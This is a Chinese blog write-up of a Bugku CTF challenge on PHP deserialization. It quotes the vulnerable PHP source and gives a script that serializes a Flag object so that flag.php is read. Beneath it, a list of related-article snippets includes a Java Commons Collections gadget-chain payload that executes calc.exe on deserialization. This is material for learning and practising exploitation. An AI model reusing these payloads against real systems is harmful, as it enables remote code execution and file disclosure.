ctf系列——反序列化漏洞

最新推荐文章于 2025-07-18 10:03:55 发布
最新推荐文章于 2025-07-18 10:03:55 发布
阅读量4.7k 收藏 8
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44699871/article/details/90578660

题目

http://123.206.87.240:8006/test1/
拿到题之后先看源码

you are not the number of bugku !   
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

根据源码内容,修改post包
在这里插入图片描述得到一款得到一段base64编码,解码之后
在这里插入图片描述尝试修改post,得到
在这里插入图片描述base64解码之后,得到一段代码


<?php  
$txt = $_GET["txt"];  
$file = $_GET["file"];  
$password = $_GET["password"];  
  
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){  
    echo "hello friend!<br>";  
    if(preg_match("/flag/",$file)){ 
		echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
<!--  
$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  
  
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}  
 -->

下载SourceLeakHacker-master,SourceLeakHacker是一款敏感目录扫描工具。看到那个绿色的200表示能够成功访问,这就是扫出来的敏感路径
在这里插入图片描述
找到flag.php,重新修改之前的报文,得到

在这里插入图片描述
修改补全之前的Flag

<?php  
  
class Flag{//flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
			echo "<br>";
		return ("good");
        }  
    }  
}  

$o = new Flag();
$o->file="flag.php";
$o->__tostring();

echo serialize($o);
?>

序列化:serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。
这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。以下是序列化后对应值:
String
s:size:value;

Integer
i:value;

Boolean
b:value; (does not store “true” or “false”, does store ‘1’ or ‘0’)

运行后得到结果:
在这里插入图片描述
得到flag.php内序列化后的内容,然后重新修改报文,提交之后的flag
在这里插入图片描述
最后拿到flag

CTF系列——反序列化漏洞
weixin_50699777的博客
04-22 953
题目 ctf2 找flag 找到题目之后要看源码!!! <?php error_reporting(0); include_once("flag.php"); $cookie = $_COOKIE['ISecer']; if(isset($_GET['hint'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?> 源码的意思是要g
ctfshow(262,264)--反序列化漏洞--字符串逃逸
m0_56019217的博客
10-23 964
源代码: index.php: message.php: 代码审计: index.php: 传参,实例化message类的对象为msg。 将msg序列化,并且将序列化字符串中的fuck字符全部替换为loveU字符,赋值给usmg。 setcookie函数设置cookie的名为msg,值为base64编码后的usmg。message.php: 当cookie被成功传入后,对cookie的值进行base64解码与反序列化。 若msg对象中的token值为admin,便输出flag.本题我们能控制的参数只有f,m
CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 3359
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
揭秘PHP反序列化:原理、利用链与防御,入门到精通教程!
最新发布
xx16755498986的博客
07-18 992
PHP反序列化漏洞是指程序未对用户输入的序列化字符串进行检测,使攻击者能够控制反序列化过程,通过注入恶意代码实现代码执行、SQL注入等攻击。序列化是将对象转换为特定格式字符串的过程,而反序列化是其逆过程。当反序列化过程中触发了特定魔术方法(如__construct、__destruct、__wakeup等)时,可能造成安全风险。攻击者可利用这些自动执行的魔术方法中的敏感操作,结合可控的类属性实施攻击。防范措施包括对输入进行严格校验、避免反序列化用户可控数据等。
CTF:PHP反序列化字符逃逸漏洞
06-16 1485
作者:高玉涵 博客:blog.youkuaiyun.com/cg_i 时间:2021.6.16 22:26、。/>/ CTF入门好难 赛后,主办方给出答案后的第77天,我终于解开了这道题。 CTF作为流行在信息安全界著名竞赛,像我这种“被赶鸭子上架的程序员”——零基础。答案都看不懂,我太难了!不了解原理和背景,资料也无从找起。输了比赛不可怕,就怕输的不明不白,抱着这种不甘,也为了探究缘故,除了努力学习别无它法,期间走了不少弯路,终得解惑。这对于我来说,没有激动与喜悦,有得只是深刻。 现将解题过程分享出
反序列化漏洞实例解析:CTF挑战中的技巧与策略
weixin_43822401的博客
06-15 826
反序列化漏洞通常发生在应用程序接收序列化对象时,未能正确验证或清理输入数据,导致恶意构造的序列化数据被不当还原为对象,可能触发代码执行或其他安全问题。
CTF-PHP反序列化漏洞1-基础知识
Eason_LYC安全白帽子的成长博客
04-11 2172
PHP序列化是将一个PHP对象转换成一个字符串,以便在不同的应用程序之间传递和存储。反序列化是将序列化的字符串转换回PHP对象。攻击者可以通过构造恶意的序列化字符串来触发代码执行,这就是PHP反序列化漏洞的本质。
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 2225
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP的反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
UNSERIALIZE——反序列化漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-19 5802
Unserialize反序列化 什么是序列化? 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 什么是反序列化? 序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象
JMX 反序列化漏洞
蚁景网安学院
07-18 1159
前段时间看到普元 EOS Platform 爆了这个洞,Apache James,Kafka-UI 都爆了这几个洞,所以决定系统来学习一下这个漏洞点。JMX(Java Management Extensions,即 Java 管理扩展)是一个为应用程序、设备、系统等植入管理功能的框架。
phar反序列化漏洞
Mi1k7ea
01-01 6122
之前做CTF遇到phar反序列化漏洞概念,这里小结一下,主要参考自https://paper.seebug.org/680/ 基本概念 phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本&gt;=5.3时默认开启支持PHAR文件的。 phar文件默认状态是只读,使用phar文件不需要任何的配置。 而phar://伪协议即PHP归档...
反序列化漏洞
weixin_45007073的博客
02-03 342
序列化与反序列 序列化:把对象转换为字节序列的过程称为对象的序列化 反序列化:把字节序列恢复为对象的过程称为对象的反序列化 漏洞成因及本质 成因:反序列化对象中存在魔术方法,而且魔术方法中的代码可以被控制,漏洞根据不同的代码可以导致各种攻击,如代码注入、SQL注入、目录遍历等等。 本质:unserialize函数的变量可控、php文件中存在可利用的类,类中有魔术方法。 魔术方法 魔术方法 触发条件 __wakeup() 使用unserialize时触发 __sleep() 使用seria
CTF-PHP反序列化漏洞3-构造POP链
Eason_LYC安全白帽子的成长博客
05-08 2384
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
CTF-反序列化
qq_61774705的博客
08-15 5293
反序列化
WEB安全-CTF中的PHP反序列化漏洞
m0_60984906的博客
04-01 1485
WEB安全之CTF中的PHP反序列化漏洞
几种反序列化漏洞
hongduilanjun的博客
08-30 878
当配置 session.serialize_handler = php_serialize 时,Session格式:a:1:{s:4:"user";s:3:"xxx";、s:3:"xxx";、a:2:{i:0;先访问这个生成:a:1:{s:4:"user";__wakeup绕过,大于实际值(PHP<=5.5),例:O:1:"c":100...__destruct调用,结构错误,例:O:1:"c":1:{xxx}
PHP反序列化漏洞+CTF实例
hyq99999的博客
08-09 1423
整理php序列化相关知识点以及在CTF中的实例。
java反序列化漏洞CTF中的利用
m0_64893612的博客
03-01 1646
序列化指的是将对象或数据结构转换为可存储或传输的格式的过程,实现的方法是;反序列化则反之,实现的方法是,可以简单地理解为将文件压缩和解压缩的过程。与PHP中反序列互相触发魔法函数导致的漏洞成因不同,java反序列化漏洞的成因主要是由于java序列化和反序列化机制的设计特点所致,简单地讲,只要反序列化代码中含有危险的命令代码,且该代码的参数是可控的,那它就存在该漏洞漏洞原理在我今天这里不是重要的,我主要想记录的是该漏洞的利用方式。通常在解题中如果你看到一段字符串以rO0AB。
CTF_Web:反序列化学习笔记(二)CTF经典考题由浅至深
AFCC_的博客(Web_Dog)
08-16 9031
0x00 CTF中的反序列化题目 这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。 0x01 攻防世界unserialize3 题目显示的源码为: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 在这里我们可以看到只有一个魔术方法,而__w
java反序列化漏洞ctf
03-31
### Java反序列化漏洞CTF中的应用与防御分析 #### 1. Java反序列化漏洞概述 Java反序列化漏洞是一种常见的安全问题,通常发生在应用程序通过网络或其他方式接收数据并将其转换为对象的过程中。如果攻击者能够控制这些输入的数据流,则可能触发恶意代码执行[^1]。 以下是几个经典的Java反序列化漏洞案例: - **Apache Commons Collections (ACC)** 序列化RCE漏洞:利用链式操作实现任意命令执行。 - **Spring框架** 的反序列化漏洞:由于未验证外部输入而导致远程代码执行。 - **Fastjson** 和其他JSON解析库的反序列化漏洞:因不恰当的对象映射机制引发的安全风险。 - **Apache Shiro** 中基于Session ID管理的功能存在反序列化缺陷。 #### 2. CTF比赛中常见场景 在CTF竞赛中,选手经常遇到涉及Java反序列化漏洞的任务。这类挑战要求参赛者深入理解目标系统的架构及其潜在弱点,并设计有效的载荷来突破防护措施。例如,在某些Web服务端可能存在未经严格校验就接受客户端提交的二进制文件的情况;或者数据库记录里保存了敏感信息却缺乏必要的加密手段保护等情形下都可能出现此类安全隐患[^4]。 下面是一个简单的例子说明如何构造payload: ```java import java.io.*; import org.apache.commons.collections.functors.InvokerTransformer; public class DeserializeExploit { public static void main(String[] args) throws Exception{ ObjectInputStream ois = null; try(FileOutputStream fos=new FileOutputStream("exploit.ser"); ObjectOutputStream oos= new ObjectOutputStream(fos)){ Transformer transformerChain=(Transformer)new ChainedTransformer( new Transformer[]{new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",null}), new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,null}), new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc.exe"})}); Map innerMap = new HashMap(); Map lazyMap = LazyMap.decorate(innerMap,transformerChain); TiedMapEntry tme = new TiedMapEntry(lazyMap,"foo"); HashSet hashSet = new HashSet(); hashSet.add(tme); oos.writeObject(hashSet); } FileInputStream fis = new FileInputStream("exploit.ser"); ois = new ObjectInputStream(fis); Object obj =ois.readObject();// This will trigger the execution of calc.exe on Windows systems. }finally{ if(ois!=null){ ois.close(); } } } } ``` 此代码片段展示了如何创建一个可以用来测试是否存在`CommonsCollections`组件相关联类型的危险行为模式——即当尝试读取特定格式化的`.ser`文件时可能会意外启动计算器程序(`calc`)作为演示效果而已,请勿用于非法目的! #### 3. 防御策略建议 为了防止遭受类似的攻击,开发者应当采取以下几项预防措施: - **白名单机制**:仅允许已知安全类别的对象被实例化。 - **输入验证**:确保所有来自不可信源的数据均经过严格的清洗处理后再参与任何运算逻辑之中。 - 使用最新版本依赖库减少暴露于公开披露过的零日威胁下的可能性。 - 定期审查第三方插件安全性状况报告及时更新替换掉那些已经被发现含有严重漏洞的产品组合部分功能模块替代方案考虑开源社区贡献出来的更健壮的选择之一[^5]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值